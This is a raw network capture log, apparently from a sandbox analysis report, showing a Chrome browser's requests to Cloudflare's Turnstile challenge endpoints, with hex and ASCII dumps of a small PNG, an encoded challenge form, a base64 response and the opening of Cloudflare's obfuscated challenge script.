                                                                                      Date: Fri, 15 Nov 2024 17:08:52 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      cache-control: max-age=2629800, public
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8845e572cae-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.1662579104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:53 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:53 UTC240INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:53 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      cache-control: max-age=2629800, public
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8892bcc6b6a-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.1662582104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:54 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 3054
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      CF-Challenge: sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://challenges.cloudflare.com
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:54 UTC3054OUTData Raw: 76 5f 38 65 33 30 64 38 37 65 63 38 61 31 36 63 33 66 3d 59 35 42 49 71 49 79 49 41 49 31 49 75 49 2d 56 39 7a 56 39 71 34 6a 71 6a 6d 63 4d 6a 63 39 6a 34 52 6d 61 35 33 39 55 52 39 4e 34 4e 61 6b 42 6a 66 4e 52 69 78 79 39 61 6f 65 49 39 71 32 30 46 39 6b 6c 33 6a 45 39 31 34 63 6d 4c 78 76 39 63 46 39 74 33 6a 55 79 4e 39 34 71 39 4d 39 6a 34 6a 4a 73 51 4f 50 39 53 6a 56 6d 43 34 39 65 49 52 6c 39 38 49 33 41 6d 46 4c 53 43 51 74 70 7a 67 47 71 50 39 48 6a 48 44 31 39 69 31 39 39 57 78 31 24 54 42 39 33 52 39 6a 36 35 64 6d 34 31 35 49 49 31 39 66 5a 55 44 63 71 69 4e 41 41 53 39 69 36 2d 39 66 65 6e 30 46 24 48 39 31 42 39 69 48 43 42 39 59 42 39 25 32 62 49 6a 78 53 49 41 6f 75 33 6a 58 39 52 71 39 47 57 51 75 59 4a 71 33 75 51 44 41 39 69 65 2d 55
                                                                                      Data Ascii: v_8e30d87ec8a16c3f=Y5BIqIyIAI1IuI-V9zV9q4jqjmcMjc9j4Rma539UR9N4NakBjfNRixy9aoeI9q20F9kl3jE914cmLxv9cF9t3jUyN94q9M9j4jJsQOP9SjVmC49eIRl98I3AmFLSCQtpzgGqP9HjHD19i199Wx1$TB93R9j65dm415II19fZUDcqiNAAS9i6-9fen0F$H91B9iHCB9YB9%2bIjxSIAou3jX9Rq9GWQuYJq3uQDA9ie-U
                                                                                      2024-11-15 17:08:54 UTC747INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:54 GMT
                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                      Content-Length: 149676
                                                                                      Connection: close
                                                                                      cf-chl-gen: /FpNYSoLePA/3wXeMNAMW3baVoXrc5Gcp6VZrSfdaZQ/SuVnz/1uUbDaAcy5gawS8nQh18OLXIxo+v1OCus3MPcng5bPsNYiLu2hwJIulIIDc0bKvUtGgeqIlSFWBF19JFCxv/doQytt2zcPObMPJavnvJujqmp4jo6NnQy4o7BFSmqcoAGvboe/wIaea9x7IOdV450MDIpDlphq7z/8pmcc6cGe8ZgwYASGF84h2x5i4YvQpgxTmWYMuoIyf32ZSW4smc/+QK92qeLWe/4gfQccMj3VVvpMDtQ1AI6S143ApOQbRR67mZch62eHytd8F3kl3MDWv1ic6Rph11gC/zKoHu6pM4ZjjIgekjY+casDUUDUj9bXjeLmu+Ew+HiKmhLZ8G0phQuBk5RjJC5pfLsX4v1yIC5LiCtZatNhHYwmunzZadBlEICaYqsu0m1+pDxKvc7hN93NIF2N2mjQQYr23xLHgpYN+laGC+KLoC1XOnw=$HMw6B4StqD5F83hw
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8905f9e4755-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:54 UTC622INData Raw: 69 6e 2b 42 58 33 71 4f 58 6f 64 50 53 49 64 35 68 32 35 61 6b 70 46 63 62 61 43 61 64 58 6d 4e 59 49 65 53 6e 58 56 35 6e 71 4b 65 61 49 57 47 68 33 32 6e 6f 4a 36 30 6f 71 47 6d 6d 6e 53 54 6b 33 57 4f 66 35 70 2f 66 35 6d 5a 6f 4a 2b 2b 70 37 53 64 6f 34 6d 49 77 73 6d 77 6f 36 75 30 70 62 53 68 7a 62 4f 5a 70 59 37 64 6e 62 71 7a 34 4c 58 59 72 4a 33 54 33 4d 65 38 71 73 66 64 78 71 58 6c 34 63 71 71 76 4e 44 46 72 73 75 7a 30 4d 72 4a 72 75 79 77 73 64 58 71 34 72 58 58 31 74 2f 38 79 4f 54 48 2f 51 4c 68 45 4e 2f 76 35 52 54 72 45 4d 76 31 7a 63 37 50 45 64 76 36 42 74 6a 64 32 67 44 32 44 76 51 63 33 4e 30 65 45 2f 7a 34 39 69 73 5a 41 2f 30 75 42 69 48 2b 4c 6a 44 30 37 6a 6f 54 38 52 63 59 2b 2f 66 2b 4d 77 77 45 41 53 63 65 41 2f 34 45 4c 41 51
                                                                                      Data Ascii: in+BX3qOXodPSId5h25akpFcbaCadXmNYIeSnXV5nqKeaIWGh32noJ60oqGmmnSTk3WOf5p/f5mZoJ++p7Sdo4mIwsmwo6u0pbShzbOZpY7dnbqz4LXYrJ3T3Me8qsfdxqXl4cqqvNDFrsuz0MrJruywsdXq4rXX1t/8yOTH/QLhEN/v5RTrEMv1zc7PEdv6Btjd2gD2DvQc3N0eE/z49isZA/0uBiH+LjD07joT8RcY+/f+MwwEASceA/4ELAQ
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 51 2f 4e 31 30 30 47 46 68 55 5a 47 45 6d 61 79 4d 36 52 43 63 35 4c 6b 78 6a 59 45 46 4f 51 7a 42 62 56 6b 31 4d 58 45 6c 79 56 45 34 39 50 33 56 58 55 45 47 47 58 6b 74 2b 53 56 64 6c 57 46 47 44 54 34 4b 47 69 4a 52 58 56 57 53 57 6b 57 31 75 6b 5a 74 36 66 59 2b 5a 6f 6c 32 69 67 6d 43 54 61 70 6d 49 5a 33 2b 4d 70 4a 71 68 62 70 52 76 70 5a 6c 77 6c 72 47 39 74 35 69 34 74 37 4c 44 65 72 4f 78 66 6e 6d 6e 6c 4b 72 41 76 36 48 42 76 5a 72 4f 77 36 61 6f 73 38 6d 50 30 38 61 30 30 4e 32 36 76 4e 6d 58 32 72 54 66 75 4a 75 37 34 2b 6e 56 73 37 65 35 74 71 62 69 78 4d 58 72 32 2b 71 76 36 4f 37 50 7a 72 72 52 39 62 54 2b 36 73 37 56 32 51 54 30 76 73 48 51 30 64 37 35 32 51 6a 47 33 4f 7a 59 35 68 54 6c 44 38 77 41 2b 4f 50 77 36 63 30 61 31 51 30 65 37
                                                                                      Data Ascii: Q/N100GFhUZGEmayM6RCc5LkxjYEFOQzBbVk1MXElyVE49P3VXUEGGXkt+SVdlWFGDT4KGiJRXVWSWkW1ukZt6fY+Zol2igmCTapmIZ3+MpJqhbpRvpZlwlrG9t5i4t7LDerOxfnmnlKrAv6HBvZrOw6aos8mP08a00N26vNmX2rTfuJu74+nVs7e5tqbixMXr2+qv6O7PzrrR9bT+6s7V2QT0vsHQ0d752QjG3OzY5hTlD8wA+OPw6c0a1Q0e7
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 31 4d 6b 5a 46 58 45 31 72 54 54 6c 74 55 7a 31 54 51 33 56 6d 64 6e 4a 43 52 6b 52 34 58 30 39 78 58 7a 51 35 57 59 46 5a 59 33 5a 6d 69 31 35 61 68 32 57 4e 68 33 43 49 62 56 2b 42 63 6f 36 4e 6a 6f 74 53 57 46 64 75 6a 6c 5a 58 63 4b 52 74 6a 57 36 6c 6d 46 74 34 64 6e 6d 63 64 6e 65 6a 73 49 43 4f 68 34 31 2b 6a 36 2b 72 69 4b 79 53 65 34 61 74 75 36 36 51 78 49 2b 50 6a 73 57 34 70 38 4b 67 77 36 53 6d 6e 38 79 66 77 70 33 42 72 36 61 4a 72 64 53 58 30 71 66 61 75 62 33 4c 79 74 4b 65 6f 39 44 48 34 74 43 6c 79 61 48 4a 75 2b 4c 42 37 37 44 54 7a 66 53 78 33 2f 62 4b 36 74 47 30 31 74 57 32 39 64 37 68 74 50 50 55 76 74 7a 51 78 39 37 72 42 2b 6a 35 37 51 58 69 7a 41 48 65 36 78 4c 57 44 2f 48 58 44 41 76 30 46 39 72 6f 48 75 44 74 31 52 44 62 34 2b
                                                                                      Data Ascii: 1MkZFXE1rTTltUz1TQ3VmdnJCRkR4X09xXzQ5WYFZY3Zmi15ah2WNh3CIbV+Bco6NjotSWFdujlZXcKRtjW6lmFt4dnmcdnejsICOh41+j6+riKySe4atu66QxI+PjsW4p8Kgw6Smn8yfwp3Br6aJrdSX0qfaub3LytKeo9DH4tClyaHJu+LB77DTzfSx3/bK6tG01tW29d7htPPUvtzQx97rB+j57QXizAHe6xLWD/HXDAv0F9roHuDt1RDb4+
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 54 32 31 50 50 30 70 46 63 45 74 70 63 6c 56 62 5a 45 5a 36 56 47 68 37 55 44 39 54 55 6b 52 62 66 47 4a 65 59 48 56 33 66 31 5a 6e 69 56 6c 67 68 47 6d 4b 58 6f 57 55 56 32 69 63 5a 32 39 6d 6e 59 2b 5a 63 47 35 79 56 33 32 48 6b 4b 6d 65 69 6d 4f 48 62 48 36 50 73 49 32 45 62 33 39 7a 71 6e 65 75 74 48 74 35 65 62 32 4d 6a 62 69 37 73 5a 4f 69 67 37 65 42 76 4b 75 71 76 4c 69 4b 76 5a 76 49 71 64 4f 50 31 5a 57 6a 78 36 61 34 6d 62 69 61 78 72 37 4c 76 64 61 32 30 4c 53 63 6f 39 54 43 36 62 61 70 71 64 37 69 79 37 7a 67 38 72 4c 4d 74 72 50 6b 79 65 76 33 73 2f 76 30 30 4c 66 70 31 74 6a 57 31 4d 62 52 33 65 4c 58 43 50 58 31 44 2f 72 6f 7a 4e 33 2b 44 67 63 46 44 78 48 57 45 41 2f 36 2b 68 54 76 46 51 72 65 39 52 72 77 46 42 6e 66 45 77 77 62 35 50 62
                                                                                      Data Ascii: T21PP0pFcEtpclVbZEZ6VGh7UD9TUkRbfGJeYHV3f1ZniVlghGmKXoWUV2icZ29mnY+ZcG5yV32HkKmeimOHbH6PsI2Eb39zqneutHt5eb2Mjbi7sZOig7eBvKuqvLiKvZvIqdOP1ZWjx6a4mbiaxr7Lvda20LSco9TC6bapqd7iy7zg8rLMtrPkyev3s/v00Lfp1tjW1MbR3eLXCPX1D/rozN3+DgcFDxHWEA/6+hTvFQre9RrwFBnfEwwb5Pb
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 47 4e 55 52 6b 31 51 55 6b 6c 6d 62 7a 46 4e 58 33 64 57 68 48 39 75 5a 6b 4e 6e 53 59 70 35 68 32 78 37 57 6d 53 49 54 45 70 73 5a 47 74 76 5a 48 52 30 55 35 56 6d 65 6e 53 62 67 34 4f 68 67 6c 68 2b 65 61 52 39 6e 61 61 4a 72 35 68 36 72 6f 6c 37 70 35 4f 73 70 34 65 6b 6c 6e 65 74 73 61 2b 4c 65 48 71 53 77 73 56 37 6c 72 75 36 75 4d 61 73 6c 5a 76 45 67 63 53 79 71 4e 4b 64 7a 61 61 51 7a 71 6d 30 70 70 72 5a 74 62 76 64 31 4e 58 63 6f 64 48 67 78 39 58 59 70 39 61 6e 35 4b 69 76 78 2b 37 67 38 38 66 45 72 38 79 30 75 4c 4c 50 36 2b 75 39 36 64 54 35 39 37 76 76 2f 66 6f 42 76 73 6a 6b 42 4e 66 57 37 4f 2f 6a 41 39 49 49 42 77 54 6e 35 77 4c 72 46 51 6f 63 2b 65 76 65 49 52 41 4e 34 77 59 50 4a 78 54 69 47 43 41 74 4a 50 73 64 2f 53 77 75 48 69 6f 4c
                                                                                      Data Ascii: GNURk1QUklmbzFNX3dWhH9uZkNnSYp5h2x7WmSITEpsZGtvZHR0U5VmenSbg4Ohglh+eaR9naaJr5h6rol7p5Osp4eklnetsa+LeHqSwsV7lru6uMaslZvEgcSyqNKdzaaQzqm0pprZtbvd1NXcodHgx9XYp9an5Kivx+7g88fEr8y0uLLP6+u96dT597vv/foBvsjkBNfW7O/jA9IIBwTn5wLrFQoc+eveIRAN4wYPJxTiGCAtJPsd/SwuHioL
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 4e 76 50 6b 73 37 64 6b 39 53 62 59 46 32 68 6c 6c 32 68 57 64 6a 59 56 32 49 62 34 6d 4e 54 32 6d 49 6b 55 35 79 67 35 4a 57 65 34 5a 39 57 5a 35 62 6a 47 47 65 6d 6e 31 30 6b 70 39 6f 67 6d 52 73 61 59 46 75 62 49 61 55 6a 6f 65 52 64 4b 69 30 6f 35 79 4a 73 58 5a 33 6e 5a 64 36 71 36 46 2b 78 37 37 45 6f 35 2f 44 67 73 69 2f 78 59 4b 65 71 5a 32 4b 77 4b 2b 73 70 62 6d 78 74 4c 75 35 73 37 72 41 7a 63 50 45 77 37 50 46 34 39 65 79 79 2b 44 71 72 65 50 6d 72 4d 43 70 33 4d 7a 75 72 75 72 6a 31 4d 36 30 32 75 6d 31 39 63 37 32 2b 2f 6a 32 38 73 59 41 2b 39 6e 6e 44 51 33 63 43 73 73 41 77 2b 41 55 37 2b 54 76 46 74 63 47 7a 4e 59 4f 48 39 6e 62 33 78 6f 45 45 66 6a 6b 4b 43 4c 6d 2b 2b 49 6c 44 68 6f 4f 4b 42 6b 75 4c 75 38 56 42 4f 38 32 41 68 6f 6f 4b
                                                                                      Data Ascii: NvPks7dk9SbYF2hll2hWdjYV2Ib4mNT2mIkU5yg5JWe4Z9WZ5bjGGemn10kp9ogmRsaYFubIaUjoeRdKi0o5yJsXZ3nZd6q6F+x77Eo5/Dgsi/xYKeqZ2KwK+spbmxtLu5s7rAzcPEw7PF49eyy+DqrePmrMCp3Mzururj1M602um19c72+/j28sYA+9nnDQ3cCssAw+AU7+TvFtcGzNYOH9nb3xoEEfjkKCLm++IlDhoOKBkuLu8VBO82AhooK
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 43 66 6a 64 6a 55 6d 52 6e 64 32 6c 45 65 46 32 44 68 56 70 76 61 47 5a 71 62 49 65 4d 55 31 53 61 61 58 4f 4d 57 49 39 62 64 33 42 77 65 31 35 6b 6c 6d 47 70 66 48 75 42 66 49 43 6d 70 48 78 73 66 36 47 70 68 4a 4b 7a 63 36 4f 6f 69 62 56 2f 74 4d 43 63 6c 35 69 6b 73 4d 61 33 77 5a 53 54 6d 61 36 69 72 4d 32 4f 30 73 57 71 30 5a 58 4f 79 37 4c 4b 6c 71 75 55 32 4e 72 51 73 37 79 69 74 4b 54 51 31 75 54 59 31 75 76 70 6f 2b 54 42 38 63 62 71 35 4d 33 32 33 2b 58 51 31 63 54 48 2b 39 4c 57 33 39 6e 52 76 65 4c 51 33 66 72 55 77 4d 62 54 44 64 7a 36 78 75 2f 65 44 51 54 68 37 64 2f 6a 30 2b 62 6c 44 52 48 34 32 50 58 33 2b 66 4d 65 2f 67 54 31 2b 67 45 48 4b 53 50 6f 48 67 34 75 49 41 45 71 42 77 44 2b 38 53 6e 33 41 69 6a 77 4b 7a 49 71 44 44 78 41 4b 68
                                                                                      Data Ascii: CfjdjUmRnd2lEeF2DhVpvaGZqbIeMU1SaaXOMWI9bd3Bwe15klmGpfHuBfICmpHxsf6GphJKzc6OoibV/tMCcl5iksMa3wZSTma6irM2O0sWq0ZXOy7LKlquU2NrQs7yitKTQ1uTY1uvpo+TB8cbq5M323+XQ1cTH+9LW39nRveLQ3frUwMbTDdz6xu/eDQTh7d/j0+blDRH42PX3+fMe/gT1+gEHKSPoHg4uIAEqBwD+8Sn3AijwKzIqDDxAKh
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 59 31 52 4a 68 6f 71 4a 69 47 35 76 68 47 53 53 67 59 32 52 64 6d 75 49 61 5a 70 51 62 6f 35 77 64 49 31 35 5a 57 5a 36 68 33 35 63 71 59 69 68 62 61 61 68 73 4b 4a 75 68 5a 47 77 73 71 69 78 6c 48 71 4d 6e 61 69 75 76 48 6d 75 78 4a 74 37 76 4a 71 6a 6e 73 4b 38 70 63 36 33 76 61 69 64 70 71 43 64 71 71 36 32 31 36 6d 56 75 64 65 54 71 72 57 63 6d 72 71 77 78 4a 32 69 73 75 47 31 70 39 65 31 32 72 2b 36 36 62 37 48 33 37 33 69 77 4e 66 71 73 61 7a 77 7a 2f 66 74 38 65 32 33 41 2b 54 77 76 4e 76 41 2f 76 63 48 41 39 6e 61 42 65 55 4a 38 65 6a 63 34 51 33 6d 35 52 50 73 46 39 66 72 43 42 55 4d 48 65 7a 34 2f 50 55 59 39 67 59 6d 35 69 66 38 41 51 55 6c 4c 43 41 79 43 53 4d 4c 46 51 63 73 4b 6a 45 33 48 52 54 76 4e 66 45 30 4d 52 6c 44 44 78 51 58 41 54 34
                                                                                      Data Ascii: Y1RJhoqJiG5vhGSSgY2RdmuIaZpQbo5wdI15ZWZ6h35cqYihbaahsKJuhZGwsqixlHqMnaiuvHmuxJt7vJqjnsK8pc63vaidpqCdqq6216mVudeTqrWcmrqwxJ2isuG1p9e12r+66b7H373iwNfqsazwz/ft8e23A+TwvNvA/vcHA9naBeUJ8ejc4Q3m5RPsF9frCBUMHez4/PUY9gYm5if8AQUlLCAyCSMLFQcsKjE3HRTvNfE0MRlDDxQXAT4
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 33 4b 47 6b 32 78 6c 64 6c 64 52 64 6e 64 59 55 6f 57 56 62 33 36 4c 6c 4b 53 67 6c 57 4e 34 59 32 5a 32 61 6f 43 64 6c 6f 69 46 68 49 70 6c 61 6f 32 50 67 48 64 32 75 57 32 48 71 62 47 4f 69 62 75 7a 6c 6e 61 67 6f 5a 62 45 79 70 69 4b 6e 61 4f 68 71 38 47 75 69 63 32 4c 31 64 54 51 6c 63 61 61 6b 61 37 50 79 70 61 64 76 61 72 50 77 62 32 68 7a 38 57 35 74 39 58 73 37 4f 65 36 72 38 50 50 73 4d 44 6a 73 4f 72 4b 32 72 61 32 76 4e 50 70 41 4e 44 75 75 41 50 54 77 37 30 49 42 76 67 47 36 4e 62 4c 32 4d 67 4a 41 65 6a 30 33 64 4c 50 38 42 48 73 45 4f 50 79 2b 41 67 57 47 77 48 75 45 75 51 5a 43 42 50 32 4b 53 51 4e 4c 68 59 6e 45 50 77 4c 48 53 37 77 36 78 58 70 4a 66 51 34 50 52 6e 31 42 78 59 4e 4c 42 38 66 46 43 4e 49 49 51 59 47 4d 79 48 2b 52 44 31 45
                                                                                      Data Ascii: 3KGk2xldldRdndYUoWVb36LlKSglWN4Y2Z2aoCdloiFhIplao2PgHd2uW2HqbGOibuzlnagoZbEypiKnaOhq8Guic2L1dTQlcaaka7PypadvarPwb2hz8W5t9Xs7Oe6r8PPsMDjsOrK2ra2vNPpANDuuAPTw70IBvgG6NbL2MgJAej03dLP8BHsEOPy+AgWGwHuEuQZCBP2KSQNLhYnEPwLHS7w6xXpJfQ4PRn1BxYNLB8fFCNIIQYGMyH+RD1E


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.1662580104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:54 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e30d87ec8a16c3f&lang=auto HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:54 UTC331INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:54 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 127756
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8905bf71443-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:54 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25
                                                                                      Data Ascii: %20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 67 4b 28 33 35 30 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 32 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 33 32 38 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 30 39 29 29 2f 39 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 34 30 36 29 29 2f 31 30 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 34 33 30 35 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 33 32 37 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67 4c 2c 64 3d 7b 27 52 49 79 45 47 27 3a 66 75 6e 63
                                                                                      Data Ascii: gK(350))/6)+-parseInt(gK(1321))/7+-parseInt(gK(328))/8+parseInt(gK(1309))/9*(parseInt(gK(406))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,643056),eM=this||self,eN=eM[gL(1327)],eO=function(gM,d,e,f,g){return gM=gL,d={'RIyEG':func
